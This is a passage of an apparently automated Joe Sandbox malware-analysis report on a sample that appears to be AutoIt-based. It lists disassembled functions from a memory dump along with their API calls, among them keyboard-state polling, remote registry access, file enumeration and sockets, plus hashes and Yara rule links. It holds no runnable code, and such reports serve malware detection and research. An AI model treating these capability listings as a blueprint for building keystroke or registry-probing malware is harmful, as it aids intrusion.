                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 2640511053-438819550
                                                                                                    • Opcode ID: 6a8008dc1974f8007e17112df43497198c131422f2f83d6d30c5e7c3655eaa92
                                                                                                    • Instruction ID: fc9759114c1cf5c1002f133b4c84902e66ff3aa4a48fe821637df25b0dd43c26
                                                                                                    • Opcode Fuzzy Hash: 6a8008dc1974f8007e17112df43497198c131422f2f83d6d30c5e7c3655eaa92
                                                                                                    • Instruction Fuzzy Hash: 94310472501B5A6FDF20AFB5EC48ADE77AD9F06324F500191E910F3092DB71EA85CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001FC7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FC00D,?,?), ref: 001FD314
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD350
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3C7
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3FD
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FC89D
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001FC908
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001FC92C
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001FC98B
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001FCA46
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001FCAB3
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001FCB48
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 001FCB99
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001FCC42
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001FCCE1
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001FCCEE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 3102970594-0
                                                                                                    • Opcode ID: 8e970f838980d30a14ea00aa5121b8a0ba2f062b4454c139d2e7ac29533bc7ee
                                                                                                    • Instruction ID: 2c85a17434a2b65d5a0847fb714fad27a8a2aa1b99294e1727c523bc6be6263b
                                                                                                    • Opcode Fuzzy Hash: 8e970f838980d30a14ea00aa5121b8a0ba2f062b4454c139d2e7ac29533bc7ee
                                                                                                    • Instruction Fuzzy Hash: 99024D716042089FD714DF24C995E3ABBE5EF48318F18849DF94ACB2A2DB31ED42DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DA54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 001DA572
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 001DA5F3
                                                                                                    • GetKeyState.USER32(000000A0), ref: 001DA60E
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 001DA628
                                                                                                    • GetKeyState.USER32(000000A1), ref: 001DA63D
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 001DA655
                                                                                                    • GetKeyState.USER32(00000011), ref: 001DA667
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 001DA67F
                                                                                                    • GetKeyState.USER32(00000012), ref: 001DA691
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 001DA6A9
                                                                                                    • GetKeyState.USER32(0000005B), ref: 001DA6BB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    • Opcode ID: e38b933cefd163b4e1d58fa7c7b4a8298ca647faa90865e0e4e7540c8f2604f7
                                                                                                    • Instruction ID: 24ff09209a8469bf6bf08df5b1f3329c4ed27b72a2be2c6cf42dcb56984cab5a
                                                                                                    • Opcode Fuzzy Hash: e38b933cefd163b4e1d58fa7c7b4a8298ca647faa90865e0e4e7540c8f2604f7
                                                                                                    • Instruction Fuzzy Hash: AC41B7745047C9AEFF31CB6498143A5BEA0AF11344F88805BD9C64A7C2EB95DDD8CBA3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F4089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32 ref: 001F40D1
                                                                                                    • CoUninitialize.OLE32 ref: 001F40DC
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00210B44,?), ref: 001F4136
                                                                                                    • IIDFromString.OLE32(?,?), ref: 001F41A9
                                                                                                    • VariantInit.OLEAUT32(?), ref: 001F4241
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F4293
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                    • API String ID: 636576611-1287834457
                                                                                                    • Opcode ID: 873a19c401ab8e3705d7d8d08611d2935782c2ea702f1aa1e1ba62741c38c0b3
                                                                                                    • Instruction ID: f1855588b8d6db334da2d7575d7ad0c9c0b89eb5e34e7dccfd195b64532d94e5
                                                                                                    • Opcode Fuzzy Hash: 873a19c401ab8e3705d7d8d08611d2935782c2ea702f1aa1e1ba62741c38c0b3
                                                                                                    • Instruction Fuzzy Hash: 8161AF712087059FD310DFA4D888F6BBBE8EF59714F004919FA859B2A1DB70ED84CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001EA488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001EA4D5
                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001EA5E8
                                                                                                      • Part of subcall function 001E41CE: GetInputState.USER32 ref: 001E4225
                                                                                                      • Part of subcall function 001E41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001E42C0
                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001EA505
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001EA5D2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1972594611-438819550
                                                                                                    • Opcode ID: 4e94b37ca19622e75d3f8c5eb01d0a57b26818013d5715cbe342f4cb37849ddb
                                                                                                    • Instruction ID: 72a76873c3d3efe25eb69e2c36028800d8a05a5490688e9c3cf1cd9181518435
                                                                                                    • Opcode Fuzzy Hash: 4e94b37ca19622e75d3f8c5eb01d0a57b26818013d5715cbe342f4cb37849ddb
                                                                                                    • Instruction Fuzzy Hash: AE41807190464AAFDF14DFA5CC49AEEBBB4FF15310F648156F809A2192DB30AE84CF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DefDlgProcW.USER32(?,?), ref: 001722EE
                                                                                                    • GetSysColor.USER32(0000000F), ref: 001723C3
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 001723D6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Proc
                                                                                                    • String ID:
                                                                                                    • API String ID: 929743424-0
                                                                                                    • Opcode ID: 35c8471c427999714fbe09b67687edfc3996b418ba5d506e57f473c36e1e88f7
                                                                                                    • Instruction ID: bd687df17e76fb56a73d1761bbb89b0ec420932fd814ccfa83e421fdc98cf53d
                                                                                                    • Opcode Fuzzy Hash: 35c8471c427999714fbe09b67687edfc3996b418ba5d506e57f473c36e1e88f7
                                                                                                    • Instruction Fuzzy Hash: A381F8F0214554BAE62D663D8C9CEBF256DEB4A300B168209F156C5697CB39CF23D236
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F2163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001F39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001F39D7
                                                                                                      • Part of subcall function 001F39AB: _wcslen.LIBCMT ref: 001F39F8
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001F21BA
                                                                                                    • WSAGetLastError.WSOCK32 ref: 001F21E1
                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 001F2238
                                                                                                    • WSAGetLastError.WSOCK32 ref: 001F2243
                                                                                                    • closesocket.WSOCK32(00000000), ref: 001F2272
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1601658205-0
                                                                                                    • Opcode ID: 28c3abc8d34713242782b8988f683396770b38c6183e78c87a0c1dd84af35dc3
                                                                                                    • Instruction ID: 4f18647e8e7f3e853c8da446cf268182a7966ca3b4b5addb3f74508d122b3799
                                                                                                    • Opcode Fuzzy Hash: 28c3abc8d34713242782b8988f683396770b38c6183e78c87a0c1dd84af35dc3
                                                                                                    • Instruction Fuzzy Hash: 0B51B375600204AFD710EF64C886F6A77E5AB58718F18C098FA199F3D3DB71ED428BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002025A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                    • String ID:
                                                                                                    • API String ID: 292994002-0
                                                                                                    • Opcode ID: 2749122de849489c6af4d86c5746032f3c28a8e95f61636f1085cc89ae972a49
                                                                                                    • Instruction ID: 318a5ec2677e58187f393af2cff71ce90377c9365625bf5ced1f26a2885d33fa
                                                                                                    • Opcode Fuzzy Hash: 2749122de849489c6af4d86c5746032f3c28a8e95f61636f1085cc89ae972a49
                                                                                                    • Instruction Fuzzy Hash: 6321B1313113118FD7149F16D898B1A7BE9EF94314F59806AE84A8B293DB72EC56CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001CE5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 001CE60A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID: X64
                                                                                                    • API String ID: 2645101109-893830106
                                                                                                    • Opcode ID: d82902fcca0f24f35a9277df3381c1cbcb90d95afaf371d71b24a510618f5969
                                                                                                    • Instruction ID: 64ea87cb703ce611ca7ed976240dd6efef71c9fdd70384dcc5b02c55c6655c00
                                                                                                    • Opcode Fuzzy Hash: d82902fcca0f24f35a9277df3381c1cbcb90d95afaf371d71b24a510618f5969
                                                                                                    • Instruction Fuzzy Hash: D4D0C9B481112DEACB94CB90EC8CDDD73BCBB14304F100155F50AE2000D73096488F10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DEB81 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001DEBAA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mouse_event
                                                                                                    • String ID:
                                                                                                    • API String ID: 2434400541-0
                                                                                                    • Opcode ID: 97e2571b0715daad9ef0b33e95da8380b839aae2c65c4b95f552aba8424288a8
                                                                                                    • Instruction ID: e572f352bc2b77d0bc1431bfb1cafda75b01f299021ff043b2cf6efac4baed4d
                                                                                                    • Opcode Fuzzy Hash: 97e2571b0715daad9ef0b33e95da8380b839aae2c65c4b95f552aba8424288a8
                                                                                                    • Instruction Fuzzy Hash: 7ED0E2B61A020129E81D3A3C9D2FE360A88A301753E90824BA4039D796E6C1B9049020
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00200BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00200C44
                                                                                                    • _wcslen.LIBCMT ref: 00200C7E
                                                                                                    • _wcslen.LIBCMT ref: 00200CE8
                                                                                                    • _wcslen.LIBCMT ref: 00200D50
                                                                                                    • _wcslen.LIBCMT ref: 00200DD4
                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00200E24
                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00200E63
                                                                                                      • Part of subcall function 0018FD60: _wcslen.LIBCMT ref: 0018FD6B
                                                                                                      • Part of subcall function 001D2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D2AE8
                                                                                                      • Part of subcall function 001D2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D2B1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                    • API String ID: 1103490817-719923060
                                                                                                    • Opcode ID: a177fa53af362be4b8a04a8ad276deb2198732c7676fd9d823a08951d35706d1
                                                                                                    • Instruction ID: 6262c5bf61fb028e7578eae53e865ff61480eea3752d0e8b848b7cec023c8ce9
                                                                                                    • Opcode Fuzzy Hash: a177fa53af362be4b8a04a8ad276deb2198732c7676fd9d823a08951d35706d1
                                                                                                    • Instruction Fuzzy Hash: A4E19F712283428FD714EF24C49092AB3E6FFA8314F14895DF8969B6E2DB30ED55CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001724C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0017259A
                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 001725A2
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001725CD
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 001725D5
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 001725FA
                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00172617
                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00172627
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0017265A
                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0017266E
                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0017268C
                                                                                                    • GetStockObject.GDI32(00000011), ref: 001726A8
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 001726B3
                                                                                                      • Part of subcall function 001719CD: GetCursorPos.USER32(?), ref: 001719E1
                                                                                                      • Part of subcall function 001719CD: ScreenToClient.USER32(00000000,?), ref: 001719FE
                                                                                                      • Part of subcall function 001719CD: GetAsyncKeyState.USER32(00000001), ref: 00171A23
                                                                                                      • Part of subcall function 001719CD: GetAsyncKeyState.USER32(00000002), ref: 00171A3D
                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,0017199C), ref: 001726DA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                    • API String ID: 1458621304-248962490
                                                                                                    • Opcode ID: 1db12c70dff18ff512d6e0b2743b9a77f0905be8ff6d046182ad8a0583e050a6
                                                                                                    • Instruction ID: fc0957a7faf10c0204db0b224dbc5e8c6eee57b382f6b22304304949ea85cc5d
                                                                                                    • Opcode Fuzzy Hash: 1db12c70dff18ff512d6e0b2743b9a77f0905be8ff6d046182ad8a0583e050a6
                                                                                                    • Instruction Fuzzy Hash: 15B18A35A01209EFDB18DFA8DC89BEE7BB4FB48314F108219FA19A7290D774E951CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00208C9B Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00208CB9
                                                                                                    • _wcslen.LIBCMT ref: 00208CCD
                                                                                                    • _wcslen.LIBCMT ref: 00208CF0
                                                                                                    • _wcslen.LIBCMT ref: 00208D13
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00208D51
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00206551), ref: 00208DAD
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00208DE6
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00208E29
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00208E60
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00208E6C
                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00208E7C
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00206551), ref: 00208E8B
                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00208EA8
                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00208EB4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
